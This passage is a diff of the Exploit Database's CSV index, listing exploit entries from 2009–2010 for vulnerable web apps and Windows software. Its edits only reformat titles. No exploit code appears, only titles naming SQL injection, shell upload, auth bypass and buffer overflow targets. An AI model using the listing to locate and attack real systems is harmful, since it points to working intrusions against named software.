Injection / Path Diclosure Download",2009-12-29,indoushka,asp,webapps,0 10772,platforms/asp/webapps/10772.txt,"AspBB - Active Server Page Bulletin Board DB Download",2009-12-29,indoushka,asp,webapps,0 @@ -10030,9 +10030,9 @@ id,file,description,date,author,platform,type,port 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10829,platforms/php/dos/10829.pl,"vBulletin Denial of Service",2009-12-30,R3d-D3V!L,php,dos,0 10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange php (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 -10833,platforms/php/webapps/10833.txt,"Classifieds Script (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange php - (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 php - (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10834,platforms/php/webapps/10834.txt,"Link Trader (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"elkagroup (pid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 @@ -10071,7 +10071,7 @@ id,file,description,date,author,platform,type,port 10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes Auth Bypass SQL Injection",2010-01-01,R3d-D3V!L,php,webapps,0 10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap PoC",2010-01-01,"D3V!L FUCKER",windows,dos,0 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 -10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter .mpga BoF DoS",2010-01-01,jacky,windows,dos,0 +10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter - .mpga BoF DoS",2010-01-01,jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services PoC",2010-01-02,SarBoT511,windows,dos,0 @@ -10079,7 +10079,7 @@ id,file,description,date,author,platform,type,port 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - (0Day)",2010-01-02,Lincoln,windows,remote,0 -10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling",2010-01-02,DigitALL,php,webapps,0 +10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - (.m3u) Exploit (0Day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - (id) SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 @@ -10105,7 +10105,7 @@ id,file,description,date,author,platform,type,port 10953,platforms/php/webapps/10953.txt,"Joomla Component com_hotbrackets - Blind SQL Injection",2010-01-03,FL0RiX,php,webapps,0 10955,platforms/asp/webapps/10955.txt,"MasterWeb Script 1.0 - (details&newsID) SQL Injection",2010-01-03,Red-D3v1L,asp,webapps,0 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - DoS PoC",2010-01-03,anonymous,multiple,dos,0 -10962,platforms/php/webapps/10962.txt,"Live TV Script SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 +10962,platforms/php/webapps/10962.txt,"Live TV Script - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10964,platforms/php/webapps/10964.txt,"Joomla Bridge of Hope Template - SQL Injection",2010-01-03,R3d-D3V!L,php,webapps,0 10965,platforms/php/webapps/10965.txt,"Joomla Component com_doqment - (cid) SQL Injection",2010-01-03,Gamoscu,php,webapps,0 10966,platforms/php/webapps/10966.txt,"Joomla Component com_otzivi - Blind SQL Injection",2010-01-03,Cyber_945,php,webapps,0 @@ -10115,12 +10115,12 @@ id,file,description,date,author,platform,type,port 10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit (2)",2010-01-03,DouBle_Zer0,windows,remote,0 10974,platforms/php/webapps/10974.txt,"Simple Portal 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0 -10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 -10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 +10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 +10977,platforms/php/webapps/10977.txt,"Smart Vision Script News - (newsdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection Exploit",2010-01-03,Sora,php,webapps,0 10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 - / IMAGIN arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 -10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 +10981,platforms/php/webapps/10981.pl,"Smart Vision Script News - (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads 1.0 - Remote File Upload",2010-01-04,kaMtiEz,php,webapps,0 10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - File Inclusion",2010-01-04,indoushka,php,webapps,0 @@ -10167,7 +10167,7 @@ id,file,description,date,author,platform,type,port 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service PoC",2010-01-07,anonymous,windows,dos,0 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload",2010-01-07,Yozgat.Us,php,webapps,0 -11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 +11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 11060,platforms/php/webapps/11060.txt,"Drupal 6.15 - Multiple Permanent XSS (0Day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking - (id) Blind SQL Injection",2010-01-07,"Hussin X",php,webapps,0 11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0Day)",2010-01-08,superli,windows,dos,0 @@ -10188,7 +10188,7 @@ id,file,description,date,author,platform,type,port 11084,platforms/windows/dos/11084.pl,"Real Player Local Crash PoC",2010-01-10,"D3V!L FUCKER",windows,dos,0 11085,platforms/php/webapps/11085.txt,"Alex Guestbook - Multiple Vulnerabilities",2010-01-11,LionTurk,php,webapps,0 11086,platforms/php/webapps/11086.txt,"Joomla Component com_dashboard - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 -11087,platforms/php/webapps/11087.txt,"ZeeWays Script SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps,0 +11087,platforms/php/webapps/11087.txt,"ZeeWays Script - SQL Injection",2010-01-10,SyRiAn_34G13,php,webapps,0 11088,platforms/php/webapps/11088.txt,"Joomla Component com_jcollection - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11089,platforms/php/webapps/11089.txt,"Joomla Component com_jvideodirect - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11090,platforms/php/webapps/11090.txt,"Joomla Component com_jashowcase - Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 @@ -10204,11 +10204,11 @@ id,file,description,date,author,platform,type,port 11106,platforms/multiple/dos/11106.bat,"Nuked KLan 1.7.7 & SP4 - DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 -11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 +11110,platforms/php/webapps/11110.txt,"Image Hosting Script - Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (Win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection",2010-01-11,"ALTBTA ",php,webapps,0 -11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 +11116,platforms/php/webapps/11116.html,"Alwjeez Script - Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote Denial of Service (0Day)",2010-01-12,mr_me,ios,dos,8080 11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0 @@ -10236,7 +10236,7 @@ id,file,description,date,author,platform,type,port 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal SEH Overflow Exploit",2010-01-16,Dz_attacker,windows,local,0 -11155,platforms/php/webapps/11155.txt,"Transload Script Upload",2010-01-16,DigitALL,php,webapps,0 +11155,platforms/php/webapps/11155.txt,"Transload Script - Upload",2010-01-16,DigitALL,php,webapps,0 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE 0.7.2 - Multiple LFI",2010-01-16,"cr4wl3r ",php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 @@ -10262,7 +10262,7 @@ id,file,description,date,author,platform,type,port 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - DoS (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11183,platforms/php/webapps/11183.txt,"Testlink TestManagement and Execution System 1.8.5 - Multiple Directory Traversal Vulnerabilites",2010-01-18,"Prashant Khandelwal",php,webapps,0 11184,platforms/multiple/webapps/11184.txt,"FreePBX 2.5.x < 2.6.0 - Permanent Cross-Site Scripting",2010-01-18,"Ivan Huertas",multiple,webapps,0 -11185,platforms/php/webapps/11185.html,"al3jeb script Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 +11185,platforms/php/webapps/11185.html,"al3jeb script - Remote Change Password Exploit",2010-01-18,alnjm33,php,webapps,0 11186,platforms/multiple/webapps/11186.txt,"FreePBX 2.5.1 - SQL injection",2010-01-18,"Ivan Huertas",multiple,webapps,0 11187,platforms/multiple/webapps/11187.txt,"FreePBX 2.5.x - Information Disclosure",2010-01-18,"Ivan Huertas",multiple,webapps,0 11188,platforms/php/webapps/11188.txt,"Fatwiki (fwiki) 1.0 - Remote File Inclusion",2010-01-18,kaMtiEz,php,webapps,0 @@ -10270,12 +10270,12 @@ id,file,description,date,author,platform,type,port 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - (.m3u) Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 11192,platforms/windows/dos/11192.txt,"OpenOffice - (.slk) Parsing Null Pointer",2010-01-19,"Hellcode Research",windows,dos,0 -11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 +11195,platforms/windows/dos/11195.html,"Microsoft Windows Defender - ActiveX Heap Overflow PoC",2010-01-19,SarBoT511,windows,dos,0 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 -11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 +11198,platforms/php/webapps/11198.txt,"al3jeb script - Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/XP/2003/Vista/2008/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 -11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0 +11202,platforms/windows/local/11202.pl,"RM Downloader - .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN 2.6.4 - File Download",2010-01-19,"Mathieu GASPARD",multiple,remote,0 11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0Day)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 @@ -10369,12 +10369,12 @@ id,file,description,date,author,platform,type,port 11315,platforms/windows/local/11315.c,"Deepburner pro 1.9.0.228 - .dbr file Buffer Overflow Exploit (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 11316,platforms/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services",2010-02-02,R3VAN_BASTARD,php,webapps,0 11317,platforms/windows/local/11317.c,"Qihoo 360 Security Guard 6.1.5.1009 - breg device drivers Privilege Escalation",2010-02-02,anonymous,windows,local,0 -11318,platforms/php/webapps/11318.txt,"Dlili Script SQL Injection",2010-02-02,Dr.DaShEr,php,webapps,0 +11318,platforms/php/webapps/11318.txt,"Dlili Script - SQL Injection",2010-02-02,Dr.DaShEr,php,webapps,0 11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash PoC",2010-02-02,SkuLL-HackeR,windows,dos,0 11321,platforms/php/webapps/11321.txt,"MobPartner Chat Multiple SQL Injection",2010-02-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - (Add Admin) CSRF",2010-02-03,"Milos Zivanovic ",php,webapps,0 -11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script (Auth Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 +11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Auth Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0 11325,platforms/php/webapps/11325.txt,"RealAdmin - (detail.php) Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 11326,platforms/php/webapps/11326.txt,"cityadmin - (links.php) Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10416,13 +10416,13 @@ id,file,description,date,author,platform,type,port 11364,platforms/multiple/local/11364.txt,"LDAP Injection PoC",2010-02-09,"mc2_s3lector ",multiple,local,0 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions Remote File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0 11366,platforms/php/webapps/11366.txt,"Newsletter Tailor Database Backup Dump",2010-02-09,"ViRuSMaN ",php,webapps,0 -11367,platforms/php/webapps/11367.txt,"Newsletter Tailor (Auth Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 +11367,platforms/php/webapps/11367.txt,"Newsletter Tailor - (Auth Bypass) SQL Injection",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow Exploit (0Day)",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0 -11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 +11376,platforms/php/webapps/11376.txt,"Fonts Site Script - Remote File Disclosure",2010-02-09,JIKO,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload",2010-02-09,JIKO,php,webapps,0 11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - Remote File Inclusion",2010-02-09,snakespc,php,webapps,0 11379,platforms/windows/local/11379.c,"feedDemon 3.1.0.9 - opml File Buffer Overflow Exploit",2010-02-09,"fl0 fl0w",windows,local,0 @@ -10438,21 +10438,21 @@ id,file,description,date,author,platform,type,port 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - XSS",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - DoS",2010-02-11,"cp77fk4r ",php,dos,0 -11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload",2010-02-11,JIKO,php,webapps,0 +11398,platforms/php/webapps/11398.txt,"GameRoom Script - Admin Bypass / File Upload",2010-02-11,JIKO,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook 2.0.4 Database Backup Dump",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 -11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 +11401,platforms/php/webapps/11401.txt,"CD Rentals Script - SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL Injection",2010-02-11,"Don Tukulesto",php,webapps,0 11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS / Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",windows,dos,80 -11408,platforms/win_x86/local/11408.c,"Radasm .rap file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 +11408,platforms/win_x86/local/11408.c,"Radasm - .rap file Local Buffer Overflow",2010-02-11,"fl0 fl0w",win_x86,local,0 11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,multiple,webapps,80 -11410,platforms/php/webapps/11410.txt,"Vacation Rental Script SQL Injection",2010-02-11,JaMbA,php,webapps,0 -11411,platforms/php/webapps/11411.txt,"apemCMS SQL Injection",2010-02-11,Ariko-Security,php,webapps,0 -11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL Injection",2010-02-11,JaMbA,php,webapps,0 +11410,platforms/php/webapps/11410.txt,"Vacation Rental Script - SQL Injection",2010-02-11,JaMbA,php,webapps,0 +11411,platforms/php/webapps/11411.txt,"apemCMS - SQL Injection",2010-02-11,Ariko-Security,php,webapps,0 +11412,platforms/php/webapps/11412.txt,"Trade Manager Script - SQL Injection",2010-02-11,JaMbA,php,webapps,0 11413,platforms/windows/local/11413.pl,"CastRipper 2.50.70 - (.asx) Playlist Stack Overflow Exploit",2010-02-12,"Jordi Chancel",windows,local,0 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 11415,platforms/php/webapps/11415.txt,"Izumi 1.1.0 - (RFI/LFI) Multiple Include",2010-02-12,"cr4wl3r ",php,webapps,0 @@ -10511,7 +10511,7 @@ id,file,description,date,author,platform,type,port 11481,platforms/php/webapps/11481.txt,"intuitive - (form.php) SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11482,platforms/php/webapps/11482.txt,"Nabernet - (articles.php) SQL Injection",2010-02-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 11483,platforms/php/webapps/11483.txt,"Joomla Component com_acteammember - SQL Injection",2010-02-17,"ALTBTA ",php,webapps,0 -11484,platforms/php/webapps/11484.txt,"uGround 1.0b SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 +11484,platforms/php/webapps/11484.txt,"uGround 1.0b - SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11485,platforms/php/webapps/11485.txt,"Multiple File Attachments Mail Form Pro 2.0 - WebShell upload",2010-02-17,EgoPL,php,webapps,0 11486,platforms/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion",2010-02-17,eidelweiss,php,webapps,0 11487,platforms/php/webapps/11487.txt,"Auktionshaus 4 - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 @@ -10581,7 +10581,7 @@ id,file,description,date,author,platform,type,port 11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,php,webapps,0 11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 - (mod.php) SQL Injection",2010-02-24,BAYBORA,php,webapps,0 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0 -11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection",2010-02-24,"Easy Laster",php,webapps,0 +11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script - Multiple SQL Injection",2010-02-24,"Easy Laster",php,webapps,0 11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps,0 11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload",2010-02-24,indoushka,php,webapps,0 @@ -10615,7 +10615,7 @@ id,file,description,date,author,platform,type,port 11603,platforms/php/webapps/11603.txt,"Joomla Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps,0 11604,platforms/php/webapps/11604.php,"Joomla Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 -11606,platforms/asp/webapps/11606.txt,"Majoda CMS (Auth Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 +11606,platforms/asp/webapps/11606.txt,"Majoda CMS - (Auth Bypass) SQL Injection",2010-02-28,Phenom,asp,webapps,0 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket 2.0 - (id) SQL Injection",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 @@ -10738,7 +10738,7 @@ id,file,description,date,author,platform,type,port 11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps,0 11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Pre-Authentication Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0 11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps,0 -11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 +11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps,0 11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload",2010-03-15,indoushka,php,webapps,0 11746,platforms/php/webapps/11746.txt,"Torrent Hoster Remont Upload Exploit",2010-03-15,EL-KAHINA,php,webapps,0 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 - Upload",2010-03-15,EL-KAHINA,php,webapps,0 @@ -10760,7 +10760,7 @@ id,file,description,date,author,platform,type,port 11766,platforms/php/webapps/11766.txt,"Joomla Component com_bidding - SQL Injection",2010-03-15,N2n-Hacker,php,webapps,0 11767,platforms/php/webapps/11767.txt,"Joomla Component com_route - SQL Injection",2010-03-15,N2n-Hacker,php,webapps,0 11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure",2010-03-15,JIKO,php,webapps,0 -11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0 +11769,platforms/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21 11771,platforms/php/webapps/11771.txt,"osCMax 2.0 - (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0 @@ -10834,7 +10834,7 @@ id,file,description,date,author,platform,type,port 11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusion",2010-03-23,mat,php,webapps,0 11850,platforms/php/webapps/11850.txt,"Zephyrus CMS - (index.php) SQL Injection",2010-03-23,Phenom,php,webapps,0 